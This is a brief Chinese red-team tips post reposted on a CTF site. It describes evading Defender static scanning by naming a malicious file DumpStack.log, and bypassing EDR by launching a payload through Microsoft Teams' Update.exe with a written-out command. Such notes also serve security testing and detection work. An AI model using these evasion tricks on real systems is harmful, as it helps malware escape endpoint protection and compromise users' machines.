红队横向 – 神奇小妙招

渗透技巧 2年前 (2022) admin
804 0 0


红队横向 - 神奇小妙招


1、绕过 Defender AV 静态检测: 


如果将恶意文件命名为 DumpStack.log,Defender 不会对其进行扫描。



2、用#MSTeams绕过#EDR 


将有效负载复制到: 


%userprofile%AppDataLocalMicrosoftTeamscurrent 


然后: 


%userprofile%AppDataLocalMicrosoftTeamsUpdate.exe –processStart payload.exe –process-start-args “args” 


使用用户下载并执行二进制文件


原文始发于微信公众号(Khan安全攻防实验室):红队横向 – 神奇小妙招

版权声明:admin 发表于 2022年1月14日 下午4:00。
转载请注明:红队横向 – 神奇小妙招 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...